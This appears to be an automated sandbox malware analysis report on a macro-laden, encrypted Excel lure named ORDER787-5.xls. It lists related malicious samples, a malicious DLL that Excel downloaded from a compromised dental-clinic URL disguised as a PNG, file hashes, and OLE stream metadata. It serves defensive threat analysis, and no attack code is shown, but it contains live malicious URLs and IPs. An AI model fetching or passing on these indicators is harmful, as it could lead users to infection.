Time	Type	Description
13:00:52	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-26496-GO-DADDY-COM-LLCUS	order.exe	Get hash	malicious	Browse	43.255.154.95
	Nuevo pedido.exe	Get hash	malicious	Browse	184.168.131.241
	R900071030.exe	Get hash	malicious	Browse	184.168.131.241
	Nuevo pedido.exe	Get hash	malicious	Browse	184.168.131.241
	https://da930.infusion-links.com/api/v1/click/5782635710906368/4861645707411456	Get hash	malicious	Browse	50.62.139.118
	SecuriteInfo.com.Variant.Razy.820883.21352.exe	Get hash	malicious	Browse	182.50.151.32
	Nuevo orden pdf.exe	Get hash	malicious	Browse	184.168.131.241
	https://bitly.com/2Xaw8VA	Get hash	malicious	Browse	50.63.41.1
	bbva confirming Aviso de pago EUR5780020210104.exe	Get hash	malicious	Browse	64.202.184.79
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	184.168.131.241
	bbva confirming Aviso de pago EUR5780020210104.exe	Get hash	malicious	Browse	64.202.184.79
	bbva confirming Aviso de pago EUR5780020210104.exe	Get hash	malicious	Browse	64.202.184.79
	DEBIT NOTE_ PZU000147200.exe	Get hash	malicious	Browse	192.169.223.13
	2021 Additional Agreement.exe	Get hash	malicious	Browse	184.168.131.241
	rib.exe	Get hash	malicious	Browse	198.71.233.109
	TN22020000560175.exe	Get hash	malicious	Browse	184.168.131.241
	V-0093717.doc	Get hash	malicious	Browse	23.229.235.131
	messaggio 2912.doc	Get hash	malicious	Browse	166.62.28.86
	Rfq_Catalog.exe	Get hash	malicious	Browse	198.71.232.3
	P.O-45.exe	Get hash	malicious	Browse	107.180.50.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	SecuriteInfo.com.VB.Trojan.Valyria.798.25424.xls	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Trojan.Valyria.798.25424.xls	Get hash	malicious	Browse	160.153.76.195
	Documentation__EG382U8V.doc	Get hash	malicious	Browse	160.153.76.195
	Documentation__EG382U8V.doc	Get hash	malicious	Browse	160.153.76.195
	5813 Filename.docx	Get hash	malicious	Browse	160.153.76.195
	5813 Filename.docx	Get hash	malicious	Browse	160.153.76.195
	Recibo de pago.xls	Get hash	malicious	Browse	160.153.76.195
	Verification Report of Interface utilization cannot be correctly get by ....docx	Get hash	malicious	Browse	160.153.76.195
	Pago Fecha 2021.xls	Get hash	malicious	Browse	160.153.76.195
	Statement_1472621419.xls	Get hash	malicious	Browse	160.153.76.195
	Statement_1472621419.xls	Get hash	malicious	Browse	160.153.76.195
	Curriculo Laura Sperandio (ps).xlsm	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.60562790.Gen.23503.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.D69B7850.Gen.24453.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.92AE33C6.Gen.14319.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.60562790.Gen.23503.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.D69B7850.Gen.24453.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.92AE33C6.Gen.14319.doc	Get hash	malicious	Browse	160.153.76.195
	SecuriteInfo.com.VB.Heur.EmoDldr.32.A0B4C65C.Gen.18253.doc	Get hash	malicious	Browse	160.153.76.195

Dropped Files

No context

Created / dropped Files

C:\ProgramData\activex.ocx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327680
Entropy (8bit):	7.594344556420887
Encrypted:	false
SSDEEP:	6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp
MD5:	1A57412AB2EDD77103FD75768BA146DD
SHA1:	81599A9B526C16B2A0A82CADCB8ACAAC6781EC81
SHA-256:	7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917
SHA-512:	7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9.zj.zj.zj.}.j.zj.}.j..zj3.'j..zj.{j..zj.}.j..zj.}.j.zj.}.j.zj.}.j.zjRich.zj........PE..L......_...........!.................-....................................... ......k-..............................06..P..../..<........\|...........................................................%..@...............(............................text............................... ..`.rdata...6.......@..................@..@.data...<6...@... ...@..............@....rsrc....\|...........`..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1104823335779463
Encrypted:	false
SSDEEP:	6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2
MD5:	88D01B15C32DC5F54651F0A97864E0EF
SHA1:	1396AB210AF8B93B30E8A46FBB83DAE780B84B11
SHA-256:	AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702
SHA-512:	0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C
Malicious:	false
Reputation:	low
Preview:	p...... ........oO.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	327680
Entropy (8bit):	7.594344556420887
Encrypted:	false
SSDEEP:	6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp
MD5:	1A57412AB2EDD77103FD75768BA146DD
SHA1:	81599A9B526C16B2A0A82CADCB8ACAAC6781EC81
SHA-256:	7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917
SHA-512:	7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
IE Cache URL:	https://www.penrithdentalimplants.com.au/ls/apperolew.png
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9.zj.zj.zj.}.j.zj.}.j..zj3.'j..zj.{j..zj.}.j..zj.}.j.zj.}.j.zj.}.j.zjRich.zj........PE..L......_...........!.................-....................................... ......k-..............................06..P..../..<........\|...........................................................%..@...............(............................text............................... ..`.rdata...6.......@..................@..@.data...<6...@... ...@..............@....rsrc....\|...........`..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FBD1845.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	2.131067658554214
Encrypted:	false
SSDEEP:	24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax
MD5:	A4CD320321FB7CB36DCDBE18372DB7F6
SHA1:	2214C8B629049D3FCAA14F59636C884A4A2AC765
SHA-256:	382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2
SHA-512:	395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A
Malicious:	false
Reputation:	low
Preview:	....l................................... EMF....P...+.......................8...X....................?......F...........GDIC................................................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......'.....................................................................................!.......!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3592917.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	2.077588804474407
Encrypted:	false
SSDEEP:	24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8
MD5:	D2F8C79A51EC1F551B9233C6FD1083EA
SHA1:	73FB2CA087FB85B595A981D499ACB31C156BB71C
SHA-256:	5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B
SHA-512:	341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19
Malicious:	false
Reputation:	low
Preview:	....l................................... EMF....P...+...........................@...........................F...........GDIC................................................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......'.....................................................................................!.......!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........

C:\Users\user\AppData\Local\Temp\CabF73B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206848634864182
Encrypted:	false
SSDEEP:	1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq
MD5:	93F2225BF5FFD6C4E480793CA89F0CBB
SHA1:	901730BE002933D11806C6417D1B35C794AFB953
SHA-256:	968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D
SHA-512:	F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD
Malicious:	false
Reputation:	low
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\FEEE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	148333
Entropy (8bit):	7.862613200850918
Encrypted:	false
SSDEEP:	3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK
MD5:	F172F8A0B25CB105FD588B810003BE34
SHA1:	A8317748F41F50D28FCCCC7CA11C74DC524D67D2
SHA-256:	E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D
SHA-512:	5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66
Malicious:	false
Reputation:	low
Preview:	...n.0.E.......D'..(,g..6@R.[......8..w(9n.....u..\.3.F...>HkJrU.H..[!M]..._.O$.....5P.#.r.y.n.xt.2T.P.]..3...@.PX..W.5.x.k......j..rk".....l.P.'.....w.l.!...sNI."&J.F\@r[U....Ic."8.L..@.p^".?@.XX ...L}..:..+@W..&O+...\.&Js.w....N..... ..a.u.Q......N.}..K..=......Q......}1.e..C.A..6..qo....5&......V.h{.Z...^.../....b^...#r.?Qn.#......x.m..`.G.a.......:E.1..!b..y....Ct.......h!w.=...Gy...t.S...n..'.Dio.....b.........s..../.>.s...G..~....D.$....... z...._.......PK..........!.8......5.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TarF73C.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 20:00:46 2021, atime=Tue Jan 5 20:00:46 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.496574117992861
Encrypted:	false
SSDEEP:	12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/
MD5:	F477EDF49DB8F29FA1F7E8563873054A
SHA1:	C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550
SHA-256:	3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55
SHA-512:	8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474
Malicious:	false
Preview:	L..................F...........7G................. ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....%R....Desktop.d......QK.X%R....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ORDER787-5.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Tue Jan 5 20:00:46 2021, atime=Tue Jan 5 20:00:46 2021, length=169984, window=hide
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	4.528803921190274
Encrypted:	false
SSDEEP:	96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g
MD5:	BE347C89A9A76E5DF8F2035AF09871FF
SHA1:	A5D5164AB3B388822846783B1D4543BA19C788C5
SHA-256:	9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF
SHA-512:	8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6
Malicious:	false
Preview:	L..................F.... ......{..........S..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....%R.. .ORDER7~1.XLS..J.......Q.y.Q.y...8.....................O.R.D.E.R.7.8.7.-.5...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop\ORDER787-5.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.R.D.E.R.7.8.7.-.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	169
Entropy (8bit):	4.42743505414388
Encrypted:	false
SSDEEP:	3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs
MD5:	4232FA4840865D1AC196D3F04B274801
SHA1:	BB30CFD9644E02C3A4766006AC5DDDD11684B15F
SHA-256:	D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7
SHA-512:	7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Jan 4 17:53:11 2021, Security: 1
Entropy (8bit):	7.881888506863549
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	ORDER787-5.xls
File size:	165376
MD5:	1d97c6cb50c4107498e4f0e76f539f0c
SHA1:	a4dc090837c76aed324bea19c9f62e2d47bb7bc8
SHA256:	1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4
SHA512:	08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3
SSDEEP:	3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3
File Content Preview:	........................>.......................................................c..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "ORDER787-5.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-01-04 17:53:11
Creating Application:	Microsoft Excel
Security:	1

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 102

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	102
Entropy:	4.1769286656
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1a 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	280
Entropy:	3.26288952551
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d a t a 2 . . . . . D i g i t a l S e c u r e . . . . . d a t a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a6 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	200
Entropy:	3.27412475502
Base64 Encoded:	False
